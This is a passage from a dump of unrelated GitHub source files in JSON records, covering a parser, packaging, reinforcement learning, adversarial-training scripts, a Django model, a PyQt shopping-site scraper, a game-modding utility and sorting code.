ZeroOrMore(' ')\n classQualifier = Forward()\n classQualifierRegex = Regex(r'[a-zA-Z_0-9]+::')\n classQualifier << classQualifierRegex + ZeroOrMore(classQualifier)\n className = Regex(r'[a-zA-Z_0-9]+')\n classAll = (ZeroOrMore(classQualifier) + className + Optional( \\\n Regex(r'<[a-zA-Z0-9\\,\\ :]+>'))).setResultsName('constructor') \n\n anyString = ( Regex(r'(.*)') ) .setResultsName('parameters_text')\n constructor = Optional(template).setResultsName('template') + \\\n classAll + anyString\n \n #parse argument \n parse = None\n try:\n parse = constructor.parseString(argument, True )\n except ParseException as err:\n Logger().debug(err.line)\n Logger().debug(str(err))\n Logger().error('constructor parsing error \"%s\"' % argument)\n sys.exit(5)\n\n try:\n Logger().debug('entering conversion ...')\n \n #set constructor and class_name\n self.constructor = ''\n for item in parse['constructor']:\n self.constructor = self.constructor + item\n self.class_name = item\n\n Logger().debug('constructor %s' % self.constructor)\n \n #analyse parameter list \n Logger().debug('constructor parameter_list:')\n parameters_text = parse['parameters_text'][1:-1]\n\n #analyse parameter list - first step: include object parameter\n first_parameter = 'std::string ObjectId '\n if parameters_text:\n parameters_text = first_parameter + ', ' + parameters_text\n else:\n parameters_text = first_parameter\n\n # parse argument list \n if parameters_text: \n liste = parameters_text.split(',')\n Logger().debug(liste)\n pos = 0\n while pos=5.4\", \"requests==2.21.0\"]\n\n\nif __name__ == \"__main__\":\n setup(\n 
name=\"ip-lock\",\n version=__VERSION__,\n description=(\n \"A utility for keeping your dynamic public\"\n \" IP address up to date within your DNS provider.\"\n ),\n author=\"Chase Nicholl\",\n author_email=\"hello@chasenicholl.com\",\n url=\"https://github.com/chasenicholl/ip-lock\",\n packages=find_packages(),\n scripts=[\"bin/ip_lock\"],\n install_requires=INSTALL_REQUIRES,\n include_package_data=True,\n )\n","repo_name":"chasenicholl/ip-lock","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"22609883975","text":"import json\nimport numpy as np\n\n#Create empty dictionary\nQ = {}\n\n#Getting the vertical and horizontal states\nvertical_space = np.linspace(-400, 400, 200)\nhorizontal_space = np.linspace(0, 500, 50)\n\n\n#Fill in the dictionary for each state\nfor i in range(len(vertical_space)+1):\n\tfor j in range(len(horizontal_space)+1):\n\t\tfor action in range(2):\n\t\t\tQ[str(((i, j), action))] = 0\n\n\n'''for i in range(len(vertical_space)+1):\n\tfor action in range(2):\n\t\tQ[str((i, action))] = 0\n'''\n\n#Open the json file\nout_file = open(\"q_table.json\", \"w\") \n\n\n#Put the initial q-values in the file\njson.dump(Q, out_file)\n\n#Close the file\nout_file.close() ","repo_name":"erkinpolat/Reinforcement-Learning","sub_path":"flappy_bird/initialize_q_table.py","file_name":"initialize_q_table.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40619821264","text":"import sys\nimport json\n\nsys.path.insert(0, 'src/data')\nsys.path.insert(0, 'src/analysis')\nsys.path.insert(0, 'src/model')\nsys.path.insert(0, 'src/test')\n\nimport preact_resnet_orig, utils_orig\nimport train_fgsm, train_pgd_orig\n# from train_pgd_orig import train_pgd_attack\n\ndef main(targets):\n '''\n Runs the main project pipeline logic, given the targets.\n targets may contain any of: 'data', 'analysis', 'model', 'test'. 
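For example, \`python run.py analysis test\` would run the analysis step and then\n the test step (targets are taken from the command line in the \`__main__\` block).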
\n \n `main` runs the targets in order of data=>analysis=>model.\n '''\n print(\"main\", targets)\n# if 'data' in targets:\n# with open('config/data-params.json') as fh:\n# data_cfg = json.load(fh)\n\n# # make the data target\n# data = get_data(**data_cfg)\n\n if 'analysis' in targets:\n with open('config/analysis-params.json') as fh:\n analysis_cfg = json.load(fh)\n\n # make the data target\n train_fgsm.main()\n\n# if 'model' in targets:\n# with open('config/model-params.json') as fh:\n# model_cfg = json.load(fh)\n\n# # make the data target\n# train(data, **model_cfg)\n \n if 'test' in targets:\n with open('config/test-params.json') as fh:\n model_cfg = json.load(fh)\n print('success')\n # make the data target\n train_pgd_orig.test_capabilities()\n print(\"done with PGD\")\n # write a successful output\n print(\"end of test\")\n# with open('test/testoutput/test_runresults.txt', 'w') as f:\n# f.write('test successful')\n return\n\n\nif __name__ == '__main__':\n # run via:\n # python main.py data model\n targets = sys.argv[1:]\n print(\"hello\")\n main(targets)\n","repo_name":"Maderlime/DSC180_Q1_Code","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8330820593","text":"import grafo\n\ndef popular_grafo(archivo):\n\twith open(archivo,'r+') as file:\n\t\t# saltear comentarios\n\t\tfor i in range(5):\n\t\t\tline = file.readline()\n\n\t\t# crear el grafo\n\t\tnuevoGrafo = grafo.Grafo()\n\t\t\n\t\t# popular el grafo\n\t\twhile line: \n\t\t\tpar = line.replace('\\n','').split('\\t')\n\t\t\tif not nuevoGrafo.vertice_pertenece(par[0]):\n\t\t\t\tnuevoGrafo.agregar_vertice(par[0])\n\t\t\tif not nuevoGrafo.vertice_pertenece(par[1]):\n\t\t\t\tnuevoGrafo.agregar_vertice(par[1])\n\t\t\tnuevoGrafo.agregar_arista(par[0],par[1])\n\t\t\tline = file.readline()\n\treturn nuevoGrafo\n\nif __name__ == \"__main__\":\n\tpopular_grafo()","repo_name":"lucas-veloso/algo-tp3","sub_path":"popgrafo.py","file_name":"popgrafo.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8587589255","text":"# Extract 500 sentences of depressed and non depressed subjects\n\nfrom json import dump, load\nfrom os import path\nfrom random import shuffle, seed\nfrom tqdm import tqdm\n\n# load precomputed json\nwith open(path.join('Data', 'data_json.json'), 'r') as json_file:\n\tdata = load(json_file)\n\n\ndataset = {\"depressed\": [], \"non depressed\": []}\nreview_len = []\n# for all the flags (\"depressed\" and \"non depressed\")\nfor flag, persons in data.items():\n\t# for all the subjects name\n\tfor per_id, history in tqdm(persons.items()):\n\t\t# for all the comments of a subject\n\t\tfor sent in history:\n\t\t\t# keep only the sentences with more than 5 words\n\t\t\tsplitted_sent = sent.split(' ')\n\t\t\tif len(splitted_sent) >= 5:\n\t\t\t\tdataset[flag].append(' '.join(splitted_sent[:5]))\n\nseed(30)\nshuffle(dataset[\"depressed\"])\nseed(30)\nshuffle(dataset[\"non depressed\"])\n\ndata_testing_gen = {\"depressed\": dataset[\"depressed\"][:500], \"non depressed\": dataset[\"non depressed\"][:500]}\n\n# save the sentences\nwith open(path.join('Data', 'data_testing_gen.json'), 'w') as json_file:\n\tdump(data_testing_gen, 
json_file)\n","repo_name":"GiacomoBerra/Master-Thesis-GPT2","sub_path":"sentence_extaction_testing.py","file_name":"sentence_extaction_testing.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70172140907","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nipFile = open(\"input.txt\", 'r')\ncontents = ipFile.read()\ncontents = contents.lower()\n\nalphabet = [chr(i+97) for i in range(26)]\nfrequencies = [0 for i in range(26)]\nchars = 0\n\nfor i in range(len(contents)):\n index = ord(contents[i]) - 97\n if index in range(0, 26):\n frequencies[index] += 1\n chars += 1\n\nfor i in range(26):\n frequencies[i] = round(frequencies[i]/chars*100, 2)\n\ny_pos = np.arange(len(alphabet))\nplt.bar(y_pos, frequencies, align='center', alpha=0.5)\nplt.xticks(y_pos, alphabet)\nplt.ylabel('Frequencies')\nplt.show()\n\n","repo_name":"D-setia/cryptoLectures","sub_path":"lec1/freqAnalysis/freqAnalysis.py","file_name":"freqAnalysis.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30909819733","text":"from django.db import models\n\nfrom aria.core.models import BaseModel\nfrom aria.discounts.managers import DiscountQuerySet\n\n_DiscountManager = models.Manager.from_queryset(DiscountQuerySet)\n\n\nclass Discount(BaseModel):\n \"\"\"\n Sets the discount level for one or more products. Product discounts can\n be limited for specific products or time periods.\n \"\"\"\n\n name = models.CharField(max_length=100)\n description = models.TextField(blank=True, null=True)\n slug = models.SlugField()\n\n products = models.ManyToManyField(\n \"products.Product\",\n verbose_name=\"products\",\n related_name=\"discounts\",\n blank=True,\n )\n product_options = models.ManyToManyField(\n \"products.ProductOption\",\n verbose_name=\"product options\",\n related_name=\"discounts\",\n blank=True,\n )\n\n minimum_quantity = models.PositiveIntegerField(\n blank=True,\n null=True,\n help_text=(\n \"The minimum product quantity for the discount to apply per orderline. \"\n \"E.g. take 3, pay for 2, the minimum quantity would be 3.\"\n ),\n )\n maximum_quantity = models.PositiveIntegerField(\n blank=True,\n null=True,\n help_text=(\n \"The maximum product quantity the discount applies to per orderline \"\n \"E.g. max amount of 10 items per customer.\"\n ),\n )\n\n discount_gross_price = models.DecimalField(\n blank=True,\n null=True,\n max_digits=10,\n decimal_places=2,\n help_text=\"Override the gross retail price of products if set.\",\n )\n discount_gross_percentage = models.DecimalField(\n blank=True,\n null=True,\n max_digits=10,\n decimal_places=2,\n help_text=(\n \"Override the gross price of the product by this percent. \"\n \"E.g. 
0.25 for 25% discount.\"\n ),\n )\n\n maximum_sold_quantity = models.PositiveIntegerField(\n blank=True,\n null=True,\n help_text=(\n \"The maximum number of product discounts given before the discount \"\n \"is ended automatically.\"\n ),\n )\n total_sold_quantity = models.PositiveIntegerField(\n blank=True,\n null=True,\n help_text=\"The amount of products this discount has been applied to.\",\n )\n display_maximum_quantity = models.BooleanField(\n default=False,\n help_text=\"Display information telling customers about maximum quantity.\",\n )\n\n active_at = models.DateTimeField(\n \"Time when discount is active from\",\n blank=True,\n null=True,\n help_text=(\n \"When the discount should be active from. \"\n \"Leave empty to activate immediately.\"\n ),\n )\n active_to = models.DateTimeField(\n \"Time when discount is active to\",\n blank=True,\n null=True,\n help_text=(\n \"When the discount should end. \"\n \"Leave emtpy to apply discount indefinitely.\"\n ),\n )\n\n ordering = models.IntegerField(\n null=True,\n help_text=(\n \"Used to order product discounts. If unset, \"\n \"product discounts will be ordered by the time of creation.\"\n ),\n )\n\n objects = _DiscountManager()\n\n class Meta:\n verbose_name = \"Discount\"\n verbose_name_plural = \"Discounts\"\n\n def __str__(self) -> str:\n return self.name\n","repo_name":"danielkjellid/aria-api","sub_path":"aria/discounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72488839148","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QTableWidgetItem\nimport requests,re\nimport time\nimport threading\nfrom lxml import etree\nfrom pandas import DataFrame\nimport pandas as pd\nfrom Ui_jdjiadianui import Ui_MainWindow\nfrom PyQt5.QtCore import QObject, pyqtSignal\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nclass MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n self.setupUi(self)\n\n self.itemurlDic = initsmallCatelog(self)\n\n self.comboBox.addItems([\"Major appliances\"])\n\n self.comboBox_2.addItems(self.itemurlDic.keys())\n \n self.pushButton.clicked.connect(self.onGetClicked)\n\n column_name = [\n 'Phone name',\n 'Price',\n 'Merchant',\n 'Number of comments'\n ]\n\n self.tableWidget.setColumnCount(len(column_name))\n\n self.tableWidget.setHorizontalHeaderLabels(column_name) # set the column header names\n\n def insertItemData(self,itemData):\n\n itemCount = self.tableWidget.rowCount()\n self.tableWidget.insertRow(itemCount);\n for i in range(0, len(itemData)):\n self.tableWidget.setItem(itemCount,i,QTableWidgetItem(itemData[i])) \n\n\n def onGetClicked(self):\n print(\"Starting spider\")\n base = \"https://list.jd.com\"\n\n #for key,value in self.itemurlDic.items():\n # print(key + \" : \" + base + value)\n\n # itemurlDic is initialised in initsmallCatelog\n url = base + self.itemurlDic[self.comboBox_2.currentText()]\n\n self.update_data_thread = UpdateData(url) # start the worker thread, passing the url parameter\n self.update_data_thread.update_date.connect(self.insertItemData) # connect the signal; the thread emits it, which calls self.insertItemData\n self.update_data_thread.start()\n\n\ndef initsmallCatelog(self):\n url = \"https://list.jd.com/list.html?cat=737,794,13701\"\n res=requests.get(url, verify=False)\n res.encoding='utf-8'\n root=etree.HTML(res.text)\n\n names = 
root.xpath('/html/body//div[@class=\"crumbs-nav-item\"][last()]//ul[@class=\"menu-drop-list\"]/li/a/text()')\n urls = root.xpath('/html/body//div[@class=\"crumbs-nav-item\"][last()]//ul[@class=\"menu-drop-list\"]/li/a/@href')\n itemurldic = dict(zip(names,urls))\n return itemurldic\n\ndef getItemData(self):\n jdInfoAll = DataFrame()\n\n # for phones the shop can also be obtained: url=\"https://list.jd.com/list.html?cat=9987,653,655&page=\"+str(i)\n\n for i in range(1,4):\n url= self._url + \"&page=\"+str(i)\n print(\"url : \" + url )\n res=requests.get(url, verify=False)\n res.encoding='utf-8'\n root=etree.HTML(res.text)\n name=root.xpath('//li[@class=\"gl-item\"]//div[@class=\"p-name\"]/a/em/text()')\n\n for i in range(0,len(name)):\n name[i]=re.sub('\\s','',name[i])\n \n shopnames = ['//li[@class=\"gl-item\"]//div[@class=\"p-shop\"]//a/text()','//li[@class=\"gl-item\"]//div[@class=\"p-shop\"]/@data-shop_name']\n # merchant name\n for shopname in shopnames:\n shopname = root.xpath(shopname)\n if len(shopname) > 0 :\n break\n\n if len(shopname) == 0:\n print(\"Could not get the merchant name\") # shop info is loaded dynamically, so fall back to \"\"\n\n #sku\n sku=root.xpath('//li[@class=\"gl-item\"]/div/@data-sku')\n\n # price\n price=[]\n comment=[]\n for i in range(0,len(sku)):\n thissku=sku[i]\n priceurl=\"https://p.3.cn/prices/mgets?callback=jQuery6775278&skuids=J_\"+str(thissku)\n pricedata=requests.get(priceurl, verify=False)\n pricepat='\"p\":\"(.*?)\"}'\n thisprice=re.compile(pricepat).findall(pricedata.text) \n price=price+thisprice\n\n commenturl = \"https://club.jd.com/comment/productCommentSummaries.action?my=pinglun&referenceIds=\"+str(thissku)\n commentdata = requests.get(commenturl)\n commentpat = '\"CommentCount\":(.*?),\"'\n thiscomment = re.compile(commentpat).findall(commentdata.text)\n comment = comment + thiscomment\n\n #self.tableWidget.insertRow(i)\n\n #self.tableWidget.setItem( i , 0 , QTableWidgetItem('Hello'))\n\n self.update_date.emit([name[i],thisprice[0],\"xxx\",thiscomment[0]]) # emit the signal\n #self.update_date.emit([name,price,comment]) # emit the signal\n #self.tableWidget.setItem( i , 0 , new QTableWidgetItem(name))\n #self.tableWidget.setItem( i , 1 , new QTableWidgetItem(price))\n #self.tableWidget.setItem( i , 2 , new QTableWidgetItem(comment))\n #self.tableWidget.\n\n\n # jdInfo = DataFrame([name,price,shopname,comment]).T\n # jdInfo.columns=['Product name','Price','Merchant','Number of comments']\n #jdInfoAll = pd.concat([jdInfoAll,jdInfo]) \n\nclass UpdateData(QtCore.QThread):\n \"\"\"Data update thread class\"\"\"\n\n update_date = pyqtSignal(list) # PyQt5 supports python3 str; there is no QString\n\n def __init__(self, url):\n super().__init__()\n self._url = url\n\n def run(self):\n #print(self.parent().urls)\n pass # this pass is meaningless\n getItemData(self)\n\n \"\"\"\n cnt = 0\n count = 10\n while cnt < count:\n cnt += 1\n self.update_date.emit(str(cnt)) # emit the signal\n time.sleep(0.5)\n print(cnt)\n \"\"\"\n\n \n","repo_name":"zhaokh/jdpachong","sub_path":"jdspider_workwindow.py","file_name":"jdspider_workwindow.py","file_ext":"py","file_size_in_byte":5530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35576014846","text":"import numpy as np\n\nimport models\nimport graphics as graph\n\n\ndef task1_3_solve(Tc, Ts, channels_num):\n channels_number_range = np.arange(1, channels_num + 1, 1)\n\n model = models.ModelUnlimitedQueue(client_t=Tc, handling_t=Ts, channels=1)\n plots = graph.ModelPlots(name=\"Model with limited queue\")\n\n min_channels = 0\n\n for channels in channels_number_range:\n model.channels = channels\n if model.is_a_coef_valid():\n min_channels = channels\n break\n\n if 
min_channels == 0:\n raise ValueError(\"'a' coefficient is more than 1 for '{}' channels\".format(channels_num))\n\n print(\"Number of channels with 'a' coefficient less than 1: \", min_channels)\n\n channels_number_range_trim = channels_number_range[min_channels - 1:]\n\n busy_coefs = []\n queue_length_expects = []\n\n for channels in channels_number_range:\n model.channels = channels\n busy_coefs.append(model.busy_coefficient())\n queue_length_expects.append(model.queue_length_expect())\n\n plots.show_feature_dep_chan(x_axis=channels_number_range, data=busy_coefs, label=\"Busy channels coefficient\")\n plots.show_feature_dep_chan(x_axis=channels_number_range, data=queue_length_expects,\n label=\"Math expect of queue length\")\n\n channels_busy = []\n busy_coefs = []\n queue_probs = []\n queue_length_expects = []\n\n for channels in channels_number_range_trim:\n model.channels = channels\n channels_busy.append(model.busy_operators())\n busy_coefs.append(model.busy_coefficient())\n queue_probs.append(model.queue_prob())\n queue_length_expects.append(model.queue_length_expect())\n\n plots.show_feature_dep_chan(x_axis=channels_number_range_trim, data=channels_busy, label=\"Math expect of busy operators\")\n plots.show_feature_dep_chan(x_axis=channels_number_range_trim, data=busy_coefs, label=\"Busy channels coefficient\")\n plots.show_feature_dep_chan(x_axis=channels_number_range_trim, data=queue_probs, label=\"Probability of queue existence\")\n plots.show_feature_dep_chan(x_axis=channels_number_range_trim, data=queue_length_expects, label=\"Math expect of queue length\")\n","repo_name":"Aruko21/RC6-AnModImModSys","sub_path":"solvers/task1_3.py","file_name":"task1_3.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"996842347","text":"#!/usr/bin/env python\nimport sys\nimport os\nimport numpy as np\nfrom matplotlib.mlab import griddata\nimport matplotlib.pyplot as plt\nimport random\n\ndef myfunc():\n temp = [random.normalvariate(50,20) for _ in xrange(100)]\n\n lat = [\"{0:.6f}\".format(random.uniform(40.25,40.46)) for _ in xrange(100)]\n long = [\"{0:.6f}\".format(random.uniform(-74.2,-74.40)) for _ in xrange(100)]\n \n x = np.random.randn(8873)\n y = np.random.randn(8873)\n '''\n plt.plot(lat, long, 'ro')\n\n plt.xlabel('latitude')\n plt.ylabel('longitude')\n plt.title('testing here')\n plt.grid(True)\n plt.savefig(\"test.png\")\n plt.show()\n '''\n heatmap, xedges, yedges = np.histogram2d(x, y, bins=50)\n extent = [xedges[0], xedges[-1], yedges[0], yedges[-1]]\n\n plt.clf()\n plt.imshow(heatmap, extent=extent)\n plt.show()\n\n \ndef main():\n temp = [random.normalvariate(50,5) for _ in xrange(100)]\n\n lat = [\"{0:.6f}\".format(random.uniform(40.42,40.46)) for _ in xrange(100)]\n long = [\"{0:.6f}\".format(random.uniform(-74.36,-74.40)) for _ in xrange(100)]\n \n a = []\n f = open('testdata.txt','w')\n for i in xrange(100):\n a.append((lat[i],long[i],temp[i]))\n if i == 99:\n f.write(str(lat[i]) + ' ' + str(long[i]) + ' ' + str(temp[i])) #don't add newline on last entry\n else:\n f.write(str(lat[i]) + ' ' + str(long[i]) + ' ' + str(temp[i]) + '|')\n #print a[i]\n #print a[0]\n \n # f.write('{location: new google.maps.LatLng(' + str(lat[i]) + ', ' + str(long[i]) + '), weight: ' + str(temp[i]) + '}') #don't add newline on last entry\n # else:\n # f.write('{location: new google.maps.LatLng(' + str(lat[i]) + ', ' + str(long[i]) + '), weight: ' + str(temp[i]) + '},\\n')\n \n # 'a' is of 
the format [(lats, lons, data), (lats, lons, data)... (lats, lons, data)]\n lats = [ x[0] for x in a ]\n lons = [ x[1] for x in a ]\n data = [ x[2] for x in a ]\n lat_min = min(lats)\n lat_max = max(lats)\n lon_min = min(lons)\n lon_max = max(lons)\n data_min = min(data)\n data_max = max(data)\n\n fig = plt.figure()\n\n ngrid = 500\n x = np.array(lats)\n y = np.array(lons)\n z = np.array(data)\n \n xi = np.linspace(lat_min, lat_max, ngrid)\n yi = np.linspace(lon_min, lon_max, ngrid)\n xi, yi = np.meshgrid(xi, yi)\n zi = griddata(x, y, z, xi, yi)\n \n # draw the map\n plt.xlim(lat_min, lat_max)\n plt.ylim(lon_min, lon_max)\n cs = plt.contourf(xi, yi, zi, 20, linewidths=1)\n plt.scatter(x, y, c=z, s=20)\n plt.colorbar(cs, shrink = 0.8, extend=\"both\")\n\n plt.show()\n \nif __name__ == '__main__':\n main()","repo_name":"sbakht/Submarine","sub_path":"visualization/testgraph.py","file_name":"testgraph.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73687286507","text":"\nsecret_word='peruano'\nhint=\"_\"*len(secret_word)\nprint('Welcome to the word guessing game!')\nprint()\nprint(f'your hint has {len(secret_word)} letters: {hint}')\n\nplay=False\n\nwhile(play==False):\n \n display=''\n user_word=input('what is your guess? :')\n if(len(secret_word)==len(user_word)):\n i=0\n while i<(len(user_word)):\n j=0\n correct_guess=0\n while j<(len(secret_word)):\n if (user_word[i]==secret_word[j]):\n \n if j==i:\n display=display+user_word[i].upper()\n correct_guess=1\n else:\n display=display+user_word[i].lower()\n correct_guess=1 \n j=j+1 \n\n if correct_guess==0:\n display=display+'_' \n \n i=i+1\n \n play=False\n \n else:\n print('Sorry, the guess must have the same number of letters as the secret word')\n play=False\n \n print(f'Your hint is: {display}') \n if(secret_word.lower()==display.lower()):\n print('Congratulations! 
You guessed it!')\n play=True\n else:\n play=False\n\n \n\n \n \n \n\n ","repo_name":"carlospoma23/BYUI","sub_path":"semester1/ces110/week7/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12718692200","text":"############################################################################################\n# Name: Peter Moldenhauer\n# Class: CS 325-400\n# Date: 9/25/17\n# Description: This program implements the merge sort algorithm.\n# It reads in input data from data.txt and outputs data to merge.out\n#\n# Note: To complete this implementation of the merge sort algorithm,\n# I used the following resources:\n# 1) The \"using induction to prove the correctness of algorithms\" class lecture video\n# 2) The website: https://rosettacode.org/wiki/Sorting_algorithms/Merge_sort\n# 3) The website: https://teamtreehouse.com/community/merge-sort-in-python\n#############################################################################################\n\n# used to get programs execution time\nimport time\nstartTime = time.time()\n\n# mergeSort function\ndef mergesort(theArray):\n # if the array has only one element just return the array\n if len(theArray) == 1:\n return theArray\n # otherwise recursively call mergeSort on both parts of theArray\n else:\n # get the midpoint of theArray\n midpoint = len(theArray)/2\n firstHalf = mergesort(theArray[:midpoint])\n secondHalf = mergesort(theArray[midpoint:])\n return merge(firstHalf, secondHalf)\n\n# merge helper function for mergeSort\ndef merge(firstHalf, secondHalf):\n # empty array to hold sorted values\n sortedArray = []\n # add to sortedArray until either firstHalf or secondHalf of the array is empty\n while len(firstHalf) != 0 and len(secondHalf) != 0:\n if firstHalf[0] < secondHalf[0]:\n sortedArray.append(firstHalf[0])\n firstHalf.remove(firstHalf[0])\n else:\n sortedArray.append(secondHalf[0])\n secondHalf.remove(secondHalf[0])\n # add the remaining value to sortedArray\n if len(firstHalf) == 0:\n sortedArray += secondHalf\n else:\n sortedArray += firstHalf\n return sortedArray\n\n# open input file and create output file\ninput_file = open('data.txt', 'r')\noutput_file = open('merge.out', 'w')\n\n# convert the string from input file to an array of characters\narrayIn = input_file.readline().split(' ')\n\n# loop through the array, sort it and get another array to sort (if applicable)\nwhile arrayIn != ['']:\n # convert array of character to array of integers\n arrayIn = map(int, arrayIn)\n\n # discard the first number, first number is array length (for C++ users)\n arrayIn = arrayIn[1:]\n\n # call mergesort function to sort the array\n arrayOut = mergesort(arrayIn)\n\n # output the sorted array to the output file\n output_file.write(' '.join(map(str, arrayOut)))\n output_file.write('\\n')\n\n # get the next array in data.txt (if applicable)\n arrayIn = input_file.readline().split(' ')\n\n# close the files\ninput_file.close()\noutput_file.close()\n\n# print the programs execution time\nprint(\"--- %s seconds ---\" % (time.time() - startTime))\n","repo_name":"Peter-Moldenhauer/Algorithms-For-School","sub_path":"Assignment 1/mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42592575876","text":"#\n# Get the current working directory of this script.\n#\n# The join() call prepends the 
current working directory, but the\n# documentation says that if some path is absolute, all other paths left\n# of it are dropped. Therefore, getcwd() is dropped when dirname(__file__)\n# returns an absolute path. The realpath call resolves symbolic links if\n# any are found.\n#\n__location__ = os.path.realpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\n#\n# Create a config parser instance and read in the config file, located\n# in the same directory as this script.\n#\nconf = configparser.ConfigParser()\nconf.read(os.path.join(__location__, 'prkeeper.conf'))\n\n# Download settings\ndownload_path = conf['downloads']['download_path']\nstatus_file = conf['downloads']['status_file']\n\n# Logging settings\nlogfile = conf['logging']['logfile']\nlog_to_console = conf['logging']['log_to_console']\nlog_to_file = conf['logging']['log_to_file']","repo_name":"bradleyfrank/notes-etc","sub_path":"scripts/Python/config_parser.py","file_name":"config_parser.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9121780060","text":"\"\"\"Script that creates the extra DrawParam slot for maps in Dark Souls 1.\n\nIn the vanilla game, only map area 15 (Sen's Fortress and Anor Londo) uses the additional DrawParam slot, but it works\nfor all maps. The slot can be changed with the EMEVD instruction `SetMapDrawParamSlot`, but note that this will affect\nall map blocks in that area (e.g. Firelink Shrine, Undead Burg, and the Depths will all change slot together). The slot\nis always set to 0 when the map is loaded.\n\nUnfortunately, no more than two slots can be used; the renderer glitches out with insane colors when slot 2 is assigned,\nand shows nothing when any other slots are assigned.\n\"\"\"\nimport logging\nfrom pathlib import Path\n\nfrom soulstruct.containers import Binder\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef add_draw_slot_1_to_all_map_areas(game_root_path):\n \"\"\"Add the second draw slot (slot 1) to all `aXX_DrawParam.parambnd[.dcx]` files that don't already have one.\"\"\"\n game_root_path = Path(game_root_path)\n for parambnd_path in game_root_path.glob(\"param/DrawParam\"):\n if parambnd_path.name.startswith(\"a\"):\n add_draw_slot_1_to_drawparam(parambnd_path)\n\n\ndef add_draw_slot_1_to_map_area(game_root_path, map_area_id):\n parambnd_path = Path(game_root_path) / f\"param/DrawParam/a{map_area_id}_DrawParam.parambnd\"\n try:\n return add_draw_slot_1_to_drawparam(parambnd_path)\n except FileNotFoundError:\n raise FileNotFoundError(f\"Could not locate DS1 DrawParam file for map area {map_area_id}.\")\n\n\ndef add_draw_slot_1_to_drawparam(parambnd_path):\n \"\"\"Add the second draw slot (slot 1) to the given `aXX_DrawParam.parambnd[.dcx]` file, if it doesn't already have a\n second slot (which only `a15_DrawParam.parambnd` does in vanilla).\n\n All draw parameters will be copied from slot 0.\n \"\"\"\n parambnd_path = Path(parambnd_path)\n if not parambnd_path.is_file():\n raise FileNotFoundError(f\"Could not locate DrawParam file: {str(parambnd_path)}\")\n draw_param = Binder(parambnd_path)\n\n if len(draw_param) != 12:\n _LOGGER.info(f\"DrawParam file {str(parambnd_path)} already has more than one slot.\")\n return\n\n try:\n area_id = parambnd_path.name.split(\"_\")[0][1:]\n except IndexError:\n raise ValueError(f\"Could not determine map area ID from DrawParam file name: {parambnd_path.name}\")\n\n # slot 1 files ('mXX_1_LightBank') come before slot 0 files 
('mXX_LightBank'), which are both before 'sXX_LightBank'\n s_ambient = draw_param[11]\n draw_param.remove_entry(11)\n for i in range(11):\n slot_0 = draw_param[i].copy()\n slot_0.id += 11\n draw_param[i].path = draw_param[i].path.replace(f\"m{area_id}_\", f\"m{area_id}_1_\")\n draw_param.add_entry(slot_0)\n s_ambient_0 = s_ambient.copy()\n s_ambient_0.id = 23\n s_ambient.path = s_ambient.path.replace(f\"s{area_id}_\", f\"s{area_id}_1_\")\n s_ambient.id = 22\n draw_param.add_entry(s_ambient)\n draw_param.add_entry(s_ambient_0)\n draw_param.write()\n","repo_name":"Grimrukh/soulstruct","sub_path":"soulstruct/darksouls1r/utilities/add_draw_slots.py","file_name":"add_draw_slots.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"37"} +{"seq_id":"37528260763","text":"\n\"\"\"\nThis is Channel Pruning reproduct,but only for pruning one layer\nAuthor: YQ\ndata:2018-1-25\nFunction: 1. Low rank 2. channel prune\n\n\"\"\"\n# 1. set import libs\nimport numpy as np\nfrom sklearn.linear_model import *\nimport sys, json\nsys.path.insert(0, 'D:/Deep_Learning/Win_Caffe/caffe-blvc/python')\nimport caffe\nfrom google.protobuf import text_format\nimport google.protobuf as pb\nfrom argparse import ArgumentParser\nfrom caffe.proto.caffe_pb2 import NetParameter, LayerParameter\nfrom util import * # my function\ndevice=0 # 0 is cpu ; 1 is gpu\nif device:\n caffe.set_mode_gpu()\n caffe.set_device(0)\nelse:\n caffe.set_mode_cpu()\n#%%\nmodel_def = 'D:/INstall_files/channel_pruning/train_val.prototxt'\nmodel_weights = 'D:/INstall_files/channel_pruning/vgg16__iter_10000.caffemodel'\n\nf, t 